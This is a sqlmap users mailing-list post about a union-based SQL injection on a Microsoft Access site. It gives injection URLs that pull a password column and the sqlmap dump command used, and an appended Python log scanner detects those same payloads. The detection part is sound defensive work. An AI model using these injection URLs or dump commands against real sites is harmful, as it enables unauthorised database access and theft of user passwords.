Hi,
I've got a simple union-based SQLi (the resulting web page shows only one entry/row). Valid statements that show the numbers in the resulting HTML page:

    ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
    ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar

- foobar is an existing table (gathered via error messages in the HTML)
- password is a valid column in the foobar table

The following URL gives you one password:

    ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 from foobar

Now I wanted to hand over to sqlmap to dump all passwords:

    sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password --dump

which did not work out (0 entries retrieved), but it was confirmed that the table has several hundred entries.

- sqlmap was able to detect that the number of columns is 13 (correct)
- sqlmap confirmed a boolean-based blind SQLi vulnerability (but no UNION-based SQLi)
- sqlmap was able to confirm the existence of the table name (with --tables) (echo foobar > txt/common-tables.txt)
- sqlmap was able to confirm the existence of the column name password (with --columns)

When running something like:

    --technique=U --union-cols=13 --union-char=1

sqlmap requested something *like*:

    ...id=-123 union all select 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from MSysAccessObjects%00

which results in the following error message (shown in the HTML page):

    The Microsoft Jet database engine cannot find the input table or query 'MSysAccessObjects'. Make sure it exists and that its name is spelled correctly.

So if sqlmap would accept a known table name on the command line that it would use to detect/confirm the union-based SQLi vuln, instead of using "MSysAccessObjects", this would make sqlmap more useful (or simply use the table name specified in -T or previously bruteforced to detect union-based SQLi).

thanks!
PS: I did *not* run sqlmap with special --risk/--level because I don't want to send several unneeded HTTP requests if the vulnerability is already confirmed (manually). I'm using sqlmap mainly for exploitation (not so much for detection) and would appreciate it if the user could tell sqlmap how to exploit a certain SQLi (something that is already partially given with --technique, --union-cols, --union-char). I did use 1.0-dev-d1ae62b.

ref:
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
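From the defender's side, the request shapes quoted in this thread (a UNION SELECT appended to the id parameter, the Jet-specific CHR(n)&CHR(n) string concatenation, a reference to an MSys* system table, and a trailing %00) and the verbose Jet error text leaked in the response are all good detection signals. The following Python is an added example, not code from the mail or from the sqlmap project: it decodes the query string of each access-log request and reports which of those indicators it matches, plus a helper for spotting the Jet error in a response body where a WAF or application log captures one. The log lines and the /item.asp path are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original mail), modelled on the
# request shapes described in the thread: a normal request, a UNION SELECT probe,
# the CHR()&CHR() / MSysAccessObjects / %00 request sqlmap sent, and a benign
# request that merely contains the word "union".
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2013:10:00:01 +0000] "GET /item.asp?id=123 HTTP/1.1" 200 5120
10.0.0.7 - - [19/Mar/2013:10:00:02 +0000] "GET /item.asp?id=123%20union%20select%20top%201%201,2,3,4,5,6,password,8,9,10,11,12,13%20from%20foobar HTTP/1.1" 200 5300
10.0.0.7 - - [19/Mar/2013:10:00:03 +0000] "GET /item.asp?id=-123%20union%20all%20select%201,2,3,4,5,6,CHR(58)%26CHR(111)%26CHR(58),8,9,10,11,12,13%20from%20MSysAccessObjects%00 HTTP/1.1" 500 812
10.0.0.9 - - [19/Mar/2013:10:00:04 +0000] "GET /search.asp?q=union%20station HTTP/1.1" 200 4100
"""

# Common Log Format with the request line split into method, path and protocol.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+'
)

# Indicators drawn from the thread, evaluated on the percent-decoded query string.
RULES = [
    # UNION [ALL] SELECT; the word "union" alone is not enough (see the benign line).
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    # Jet/Access builds strings with CHR(n)&CHR(n), which sqlmap uses as a marker.
    ("jet_chr_concat", re.compile(r"chr\(\d+\)\s*&\s*chr\(\d+\)", re.I)),
    # MSysAccessObjects, MSysObjects, ...: Access system tables.
    ("access_system_table", re.compile(r"\bmsys\w+", re.I)),
    # Literal NUL byte after decoding (%00), used to truncate the rest of the query.
    ("null_byte", re.compile("\x00")),
]

# Verbose Jet error text quoted in the thread; its presence in a response body
# means the application is echoing database errors to the client.
JET_ERROR = "The Microsoft Jet database engine cannot find the input table or query"


def decode_query(path):
    """Return the percent-decoded query string of a request path ('' if none)."""
    _, sep, query = path.partition("?")
    return unquote_plus(query) if sep else ""


def match_rules(decoded_query):
    """Names of all indicator rules that fire on a decoded query string."""
    return [name for name, rx in RULES if rx.search(decoded_query)]


def scan_log(text):
    """Parse CLF lines and return one record per request that matches any rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        rules = match_rules(decode_query(m.group("path")))
        if rules:
            hits.append({
                "ip": m.group("ip"),
                "status": m.group("status"),
                "path": m.group("path"),
                "rules": rules,
            })
    return hits


def jet_error_in_body(body):
    """True if a captured response body leaks the Jet 'cannot find the input table' error."""
    return JET_ERROR in body


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ", ".join(hit["rules"]), hit["path"])
```

Decoding before matching matters: the CHR()&CHR() marker arrives as `%26` and the NUL as `%00`, so a rule applied to the raw request line misses both. A 500 status next to the `access_system_table` hit is exactly the failed sqlmap probe the thread describes, and the `jet_error_in_body` check flags the underlying misconfiguration (error details reaching the client) independently of any one payload.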